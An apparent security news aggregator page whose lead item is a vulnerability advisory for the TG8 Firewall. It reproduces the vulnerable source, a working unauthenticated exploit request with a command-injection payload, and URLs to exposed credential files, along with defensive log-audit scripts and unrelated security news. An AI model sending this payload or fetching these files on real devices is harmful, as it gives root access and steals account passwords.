Malware Devil

Monday, May 3, 2021

SSD Advisory – TG8 Firewall PreAuth RCE and Password Disclosure

TL;DR

Find out how vulnerabilities in TG8 Firewall allow remote unauthenticated users to execute arbitrary code on the remote device as well as disclose the passwords of existing accounts.

Vulnerability Summary

Two security vulnerabilities have been found in TG8 Firewall. The first allows a remote user to execute commands as the root user without needing to authenticate with the device or have any privileged access. The second allows existing users’ passwords to be exposed without authenticating with the remote device.

CVE

Pending

Credit

An independent security researcher has reported this vulnerability to the SSD Secure Disclosure program.

Affected Versions
TG8 Firewall

Vendor Response

Numerous attempts to contact the vendor via Twitter, Facebook and Emails have not triggered any response from the vendor. We urge customers of this product to immediately block internet facing port 80/443 used for administering the device – it can be easily compromised.

Vulnerability Analysis

PreAuth RCE

The vulnerability exists in the way the authentication request is handled, which leads to remote command execution with root user privileges. The data passed via the user and password parameters is used directly as a parameter of a Linux command, which allows command execution.

index.php source code

If you examine the index.php file you will notice that it calls runphpcmd.php with a value of 'sudo /home/TG8/v3/syscmd/check_gui_login.sh ' + username + ' ' + pass. This is very strange and very unusual, but what you should immediately notice is that it is basically calling a command prefixed with sudo and examining the response to that command.

Obviously, if we change the cmd being called we can theoretically execute any command, but let’s first verify what runphpcmd.php does, as it may be filtering or limiting what commands can be run:


function checkLogin() {
    var username = $('input[name=u]').val();
    var pass = $('input[name=p]').val();
    // The full shell command line is assembled in the browser from the form fields
    var cmd = 'sudo /home/TG8/v3/syscmd/check_gui_login.sh ' + username + ' ' + pass;
    $.ajax({
        url: "runphpcmd.php",
        type: "post",
        dataType: "json",
        cache: "false",
        data: {
            // Sent to the server as-is in the syscmd POST parameter
            syscmd: cmd
        },
        success: function (x) {
            if (x == 'OK') {
                ok(username);
            } else {
                failed();
            }
        },
        error: function () {
            // The error path also calls ok(username)
            ok(username);
            // alert("failure to excute the command");
        }
    })
}

runphpcmd.php source code

As can be seen in the source code of runphpcmd.php, there is no verification of what syscmd runs, and the outcome is returned in JSON format to the caller of this file:

<?php
header('Content-Type: application/json');
$response = array();
$output = array();
// Command string taken verbatim from the POST body, with no validation
$cmd_1 = $_POST['syscmd'];
// The received command is appended to a log file before it runs
$data = 'cmd= '.$cmd_1."\n";
$fp = fopen('/opt/phpJS.log', 'a');
fwrite($fp, $data);
// Executed as a shell command line; output lines are collected in $output
exec($cmd_1, $output, $ret);
$data = ' output ='. json_encode($output)."\n*******************************************************\n";
$fp = fopen('/opt/phpJS.log', 'a');
fwrite($fp, $data);
$response[] = array("result" => $output);
// Encoding array in JSON format
echo json_encode($output);
?>

Exploit

POST http://<server>/admin/runphpcmd.php HTTP/1.1
Host: Server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Connection: keep-alive

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+<command here>++local

The value passed via the syscmd parameter is not sanitized, which leads to RCE.

For example, the ls command is executed in the request below. Payload: ;ls;

syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bls%3B++local

The response to the above request will contain the result of the command execution.
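One way to review the log that runphpcmd.php writes, as an added example (not code from the advisory or the vendor): the script appends every received syscmd value to /opt/phpJS.log before executing it, so entries that differ from the login check's command shape stand out. The sample log is constructed, and the metacharacter set, together with the assumption that legitimate credentials avoid those characters, is an assumption of this example.

```python
import re

# Command prefix that index.php's checkLogin() sends, as shown in the advisory.
EXPECTED_PREFIX = "sudo /home/TG8/v3/syscmd/check_gui_login.sh"

# Characters that let a shell chain, substitute or redirect commands.
# Assumption: legitimate usernames and passwords do not contain these; tune
# the set if your accounts do, or expect false positives.
SHELL_META = re.compile(r"[;&|`$<>(){}\\]")


def audit_phpjs_log(text):
    """Return (line_number, reason, content) for suspicious phpJS.log entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        if line.startswith("cmd= "):
            cmd = line[len("cmd= "):]
            if cmd != EXPECTED_PREFIX and not cmd.startswith(EXPECTED_PREFIX + " "):
                # Something other than the login check was submitted as syscmd.
                findings.append((lineno, "unexpected-command", cmd))
            elif SHELL_META.search(cmd[len(EXPECTED_PREFIX):]):
                # Login check prefix, but the arguments carry shell syntax.
                findings.append((lineno, "shell-metacharacter", cmd))
        elif line.startswith(" output =") or set(line) == {"*"}:
            continue  # result line or record separator written by runphpcmd.php
        else:
            # Each record has exactly one "cmd= " line and one JSON output line,
            # so any other line means the syscmd value contained a newline.
            findings.append((lineno, "embedded-newline", line))
    return findings


# Constructed sample in the layout produced by the fwrite() calls above.
SAMPLE_LOG = (
    "cmd= sudo /home/TG8/v3/syscmd/check_gui_login.sh admin example-pass\n"
    ' output =["OK"]\n'
    "**********\n"
    "cmd= sudo /home/TG8/v3/syscmd/check_gui_login.sh ;ls;  local\n"
    ' output =["index.php","runphpcmd.php"]\n'
    "**********\n"
    "cmd= uname -a\n"
    ' output =["Linux"]\n'
    "**********\n"
    "cmd= sudo /home/TG8/v3/syscmd/check_gui_login.sh admin x\n"
    "uname -a\n"
    " output =[]\n"
    "**********\n"
)

if __name__ == "__main__":
    for lineno, reason, content in audit_phpjs_log(SAMPLE_LOG):
        print(f"line {lineno}: {reason}: {content!r}")
```

Because index.php places the submitted password on the command line, this log also holds credentials in clear text, so findings should be handled as sensitive data.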

Password Disclosure

The /data/ folder, which is insecurely accessible to remote unauthenticated users, stores the credentials of previously logged-on users. Since this folder doesn’t require any special access, enumerating the files located under it can reveal accounts present on the TG8 Firewall.

Example URLs:

http://<server>/data/w-341.tg
http://<server>/data/w-342.tg
http://<server>/data/r-341.tg
http://<server>/data/r-342.tg
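To check whether the /data/ files have already been fetched, web server access logs can be searched for requests matching the example URLs above. This added example (not from the advisory) assumes Common/Combined Log Format lines; the sample log and client addresses are constructed.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# Assumption: the web server writes Common/Combined Log Format lines.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})\b'
)
# File names of the form shown in the advisory: /data/w-341.tg, /data/r-341.tg
TG_FILE = re.compile(r"^/data/[^/]+\.tg$", re.IGNORECASE)


def normalise(target):
    """Decode percent-escapes and collapse ./ and ../ so variants compare equal."""
    if target.startswith("/"):
        path = target.split("?", 1)[0].split("#", 1)[0]
    else:
        path = urlsplit(target).path  # absolute-form target: http://host/path
    return "/" + posixpath.normpath(unquote(path)).lstrip("/")


def tg_access_by_client(log_text):
    """Summarise requests for /data/*.tg per client, busiest client first."""
    clients = defaultdict(lambda: {"requested": set(), "served": set()})
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        path = normalise(m.group("target"))
        if not TG_FILE.match(path):
            continue
        entry = clients[m.group("ip")]
        entry["requested"].add(path)
        if m.group("status").startswith("2"):
            entry["served"].add(path)  # the file content left the device
    report = [
        {"client": ip,
         "requested": sorted(e["requested"]),
         "served": sorted(e["served"])}
        for ip, e in clients.items()
    ]
    report.sort(key=lambda r: (-len(r["requested"]), r["client"]))
    return report


# Constructed access log; addresses are from the documentation ranges.
SAMPLE_ACCESS_LOG = "\n".join([
    '198.51.100.7 - - [03/May/2021:10:00:01 +0000] "GET /data/w-341.tg HTTP/1.1" 200 312',
    '198.51.100.7 - - [03/May/2021:10:00:01 +0000] "GET /data/w-342.tg HTTP/1.1" 200 298',
    '198.51.100.7 - - [03/May/2021:10:00:02 +0000] "GET /data/r-343.tg HTTP/1.1" 404 0',
    '198.51.100.7 - - [03/May/2021:10:00:02 +0000] "GET /admin/../data/%72-341.tg HTTP/1.1" 200 120',
    '192.0.2.10 - - [03/May/2021:10:05:00 +0000] "GET /admin/index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [03/May/2021:10:05:03 +0000] "GET /data/w-341.tg HTTP/1.1" 200 312',
])

if __name__ == "__main__":
    for row in tg_access_by_client(SAMPLE_ACCESS_LOG):
        print(row["client"], len(row["requested"]), "requested,",
              len(row["served"]), "served:", ", ".join(row["served"]))
```

Any file listed under "served" should be treated as disclosed, and the passwords of the accounts it covers changed.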

Remembering Dan Kaminsky, Apple AirDrop Vulnerability

Remembering Dan Kaminsky who was one of the greatest security researchers of our time plus details on a new Apple Airdrop vulnerability. ** Links mentioned on the show ** Remembering Dan Kaminsky https://www.nytimes.com/2021/04/27/technology/daniel-kaminsky-dead.html Apple AirDrop Bug Could Leak Your Personal Info to Anyone Nearby https://thehackernews.com/2021/04/apple-airdrop-bug-could-leak-your.html https://www.komando.com/security-privacy/apple-airdrop-security-flaw/787628/ ** Watch this episode on YouTube ** https://youtu.be/N6T6qcRfTBA ** […]

The post Remembering Dan Kaminsky, Apple AirDrop Vulnerability appeared first on The Shared Security Show.


3 Best Practices for Customizing Your Compliance Program

Most large-scale entities need to prove compliance with multiple regulatory standards. In their efforts to meet their compliance mandates, organizations could suffer a major drain on their time and resources. This possibility holds true regardless of whether they’re finance companies, retailers, manufacturers or hospitality firms. Organizations face an additional obstacle when they have an internally […]

The post 3 Best Practices for Customizing Your Compliance Program appeared first on The State of Security.

6 Steps To Improve Your Data Security and Data Compliance

Data privacy has been a hot topic in the tech world for years now. With every new technology come new regulations that require companies to completely re-examine the way they handle private data. Most companies already have a basic data privacy policy they constructed alongside lawyers and tech experts to avoid facing serious fines and […]

The post 6 Steps To Improve Your Data Security and Data Compliance appeared first on The State of Security.

ISC Stormcast For Monday, May 3rd, 2021 https://isc.sans.edu/podcastdetail.html?id=7482, (Mon, May 3rd)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

FIPAC: Thwarting Fault- and Software-Induced Control-Flow Attacks with ARM Pointer Authentication


A comparative study of neural network techniques for automatic software vulnerability detection


Sunday, May 2, 2021

Six things you have to know about ITAR compliance

International Traffic in Arms Regulations (ITAR) is a set of regulations administered by the State Department to control the export of defense and military related technologies. The goal of the legislation is to control access to specific types of technology and their associated data by our country’s enemies. Any U.S. company, research lab […]

The post Six things you have to know about ITAR compliance appeared first on PreVeil.


PuTTY And FileZilla Use The Same Fingerprint Registry Keys, (Sun, May 2nd)

Many SSH clients can remember SSH servers’ fingerprints. This can serve as a safety mechanism: you get a warning when the server you want to connect to, has no longer the same fingerprint. And then you can decide what to do: continue with the connection, or stop and try to figure out what is going on.

This happened to me a couple of months ago. I wanted to transfer some files over SSH with FileZilla, and received a prompt that the server I usually connect to, had an unknown fingerprint. I did not go through with the connection, and started to investigate what was going on.

Long story short: I had removed SSH fingerprints cached by PuTTY in the Windows registry, and this impacted FileZilla: both use the same registry keys for their fingerprint cache.

You can see the registry keys here in FileZilla’s source code:

If you do forensics on Windows machines, be aware that these registry keys are not only used by PuTTY, but also by FileZilla’s fzsftp.exe module.

I have more details here if you are interested.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Curo/bin

This post wraps up another Twitter thread I started a few days ago: If you ever get bored using “copy” to copy files you can always use … curl: curl […]

Throwing LOLBIN a tar ball

This post summarizes some of the findings I posted on Twitter the other day. While looking at Windows version of tar.exe I discovered that it includes lots of undocumented command […]

Gup o/ bin

Notepad ++ comes with a built-in Updater called GUP typically located here: c:\Program Files (x86)\Notepad++\updater\GUP.exe It is a generic downloader that accepts a range of command line arguments, and while […]

FTP.EXE Lolbin v2

@0gtweet‘s tweet inspired me to look at lolbin stuff again (as it is often the case). So… everyone knows we can use ftp.exe as a lolbin and using COMSPEC trick […]

CPDP 2021 – Moderator: John Davisson ‘Student Privacy At Risk Under Covid-19: Online Test Proctoring Brings AI And Surveillance Into Students’ Homes’

Speakers: Lydia X. Z. Brown, Meg Foulkes, Sofie Van Londen, Maha Bali

Our sincere thanks to CPDP 2021 – Computers, Privacy & Data Protection Conference for publishing their well-crafted videos on the organization’s YouTube channel. Enjoy!

The post CPDP 2021 – Moderator: John Davisson ‘Student Privacy At Risk Under Covid-19: Online Test Proctoring Brings AI And Surveillance Into Students’ Homes’ appeared first on Security Boulevard.

XKCD ‘After The Pandemic’

via the comic delivery system monikered Randall Munroe at XKCD!

The post XKCD ‘After The Pandemic’ appeared first on Security Boulevard.

CPDP 2021 – Moderator: Brent R. Homan ‘When Regulatory Worlds Collide – The Intersection Of Privacy, Competition And Consumer Protection’

Speakers: Anna Colaps, Erika M. Douglas, Ian Cohen, Alan Campos Elias Thomaz

Our sincere thanks to CPDP 2021 – Computers, Privacy & Data Protection Conference for publishing their well-crafted videos on the organization’s YouTube channel. Enjoy!

The post CPDP 2021 – Moderator: Brent R. Homan ‘When Regulatory Worlds Collide – The Intersection Of Privacy, Competition And Consumer Protection’ appeared first on Security Boulevard.

[Open-Xchange] high – SSRF – Unchecked Snippet IDs for distributed files (1500.00USD)


Security Is Top Priority In Latest Chrome Build

Back in February, Google began experimenting with a new feature that defaulted all URLs to use “https:” rather than the less secure “http:.”

While defaulting to the secure socket layer isn’t ironclad protection for netizens, it’s certainly a step in the right direction, which is why Google recently promoted the change out of the canary builds and into the mainstream.

Right now, if you download and install Chrome 90, you’ll find that this protection is automatic. You don’t have to do anything beyond installing Chrome 90.

In addition to offering the protection outlined above, Chrome 90 also includes nearly 40 security fixes, including resolving 3 low-severity flaws, 10 medium-severity flaws and six high-severity issues.

Finally, Chrome 90 includes the AV1 encoder, which provides enhanced support for a number of video-conferencing applications including Webex, Meet, and Duo. Among other things, AV1 offers improved screen sharing capabilities and allows users on low bandwidth networks to utilize video.

All that to say, Chrome 90 is an update you don’t want to miss. If it’s been a while since you paid attention to Chrome updates and you’re a bit behind the times, this is one upgrade you’ll definitely want to make a priority. While nothing in the build is particularly flashy, it does provide solid protection. That, combined with the fact that it addresses a wide range of security issues as described above, and includes a raft of other enhancements makes it well worth getting.

Kudos to Google for continuing to put user security front and center and making it an integral part of their product improvement road map. While it’s true that there are other companies out there that are even more active when it comes to bolstering user security, the number is small enough that you could probably count them on one hand with fingers left over.

Used with permission from Article Aggregator


Saturday, May 1, 2021

YARA Release v4.1.0, (Sat, May 1st)

YARA version 4.1.0 was released.

There are no major changes. Some new string testing functions: icontains, …

Most surprising to me was the addition of the \t escape sequence in text strings. I didn’t know this wasn’t supported in prior versions.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Task Force delivers strategic plan to address global ransomware problem

The Ransomware Task Force (RTF), a think tank composed of more than 60 volunteer experts who represent organizations encompassing industries and governments, has recently pushed out a comprehensive and strategic plan for tackling the increasing threat and evolution of ransomware.

The report, entitled “Combating Ransomware – A Comprehensive Framework for Action: Key Recommendations from the Ransomware Task Force”, which you can read here [PDF], advocates for “a unified, aggressive, comprehensive, public-private anti-ransomware campaign.”

The purpose of creating the document seems to be threefold: first, to educate the targeted reader—in this case, policy makers and industry leaders—about the dangers of ransomware; second, to call for unification amongst organizations to collectively beat the ransomware enterprise; and third, to guide organizations and governments on action items (48 in total) they can pursue to disrupt the ransomware-as-a-service (RaaS) model and extensively lessen the impact of current and future attacks.

“This is great news and sorely needed,” says Jerome Segura, Director of Threat Intelligence at Malwarebytes, in an email. “One key aspect is, of course, international cooperation (or the lack thereof) which has proven to be a key reason why many criminals from Eastern Europe can continue their business without real fear of prosecution.”

Ransomware: a threat to national security

Ransomware attacks had been popping up left and right, even before the COVID-19 pandemic threw a wrench into cybersecurity efforts of many already challenged companies and industries. Ransom demands inflated steeply through the pandemic, and the money raised appears to be being reflected in increasing innovation and sophistication.

The report quantifies the impact of ransomware attacks with some startling statistics. According to the RTF, the average ransom payment in 2020 was $312,493, an increase of 171% over the previous year. Perhaps even more costly and damaging, it puts the average time it takes to fully recover from a ransomware attack at just over nine months.

Ransomware statistics collated by the task force (Source: The RTF Report 2020)

Note that these are average numbers, which means that there are cases when organizations have dealt with much longer downtimes and paid far higher ransoms (demands go into the tens of millions) to get their businesses back up and running as quickly as possible.

Gone are the days when threat actors behind ransomware campaigns targeted organizations they thought had the means to readily cough up money to meet their demands. These past few years, ransomware gangs have become more opportunistic, perhaps comforted by the wide availability of ransom insurance. They have deliberately targeted networks and breached systems of vital infrastructure, such as hospitals, schools, local governments, and nuclear plants, knowing full well that they may be putting lives at risk.

Organizations who refuse to pay the ransom have then to deal with the data leaking that will inevitably follow; the delays caused by identifying and fixing the problems that allowed the ransomware gang into its systems; and the cost to undergo crisis management efforts and generally getting back on track as quickly as possible, while also increasing their overall cybersecurity posture. On the other hand, organizations who do pay the ransom get to spend millions of dollars, too, on top of the ransom payment and still aren’t guaranteed to get their data back, or a speedy recovery.

Ransom payments may then be used to fund criminal enterprises that, for example, engage in human trafficking, terrorism, and “the proliferation of mass destruction”. But perhaps the most damaging of all is that ransomware attacks can sow doubt in the minds of the public towards public institutions.

To add salt to the wound, ransomware threat actors do this from within countries that are turning a blind eye to, or even encouraging, these cybercrime campaigns. They are safe havens where gangs know they won’t be charged, prosecuted or extradited for their actions. It is not difficult then to see why the RTF urged its audience to “raise the priority of ransomware within the intelligence community, and designate it as a national security threat” while advocating the use of “criminal prosecution and other tactics”.

Core actions organizations and governments must take

Although there are multiple steps recommended in the report, the RTF prescribes that these steps should be viewed and considered part of a bigger whole as they were each designed to complement and build on each other.

According to the report:

“The strategic framework is organized around four primary goals: to deter ransomware attacks through a nationally and internationally coordinated, comprehensive strategy; to disrupt the business model and reduce criminal profits; to help organizations prepare for ransomware attacks; and to respond to ransomware attacks more effectively.”

To see the necessary impact against the ransomware enterprise, the task force stresses the importance of adopting these steps as soon as possible, with continuous coordination among the involved parties at a national and international level. (The RTF has proposed that the US government take charge in international coordination efforts with its partners.)

Among its priority recommendations, the RTF proposes that greater prioritization be given to intelligence-driven anti-ransomware efforts; mandatory reporting of ransomware attacks and the creation of Cyber Response and Recovery funds; the development of a framework to help organizations prepare for, and respond to, ransomware attacks; and greater regulation of the cryptocurrency sector.

Among the action items to be done, these are the five most urgent, according to the Ransomware Task Force. The rest are supporting actions that strengthen or lead to the fulfillment of these five. (Source: The RTF Report 2020)

About the RTF and other anti-ransomware efforts

The Institute of Security and Technology (IST) is the host organization that launched the Ransomware Task Force four months ago in December 2020. Before this, significant efforts have been made by organizations within or associated with the cybersecurity industry in combating ransomware.

In January this year, the Cybersecurity and Infrastructure Security Agency (CISA) launched the Reduce the Risk of Ransomware Campaign where it focused on educating the public and private sectors on anti-ransomware best practices and what tools and resources to use to mitigate attacks. CISA’s one-stop page for everything one needs to know about ransomware can be found on this CISA ransomware page.

In July 2016, Europol’s European Cybercrime Centre joined forces with other law enforcement bodies and IT security companies to launch No More Ransom (NMR). Similar to the above mentioned efforts, NMR also aims to help victims recover their data without shelling out money. They do this by collating decryption tools for ransomware families, created by cybersecurity volunteers. You can learn more about No More Ransom by visiting its official website.

The post Task Force delivers strategic plan to address global ransomware problem appeared first on Malwarebytes Labs.


Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...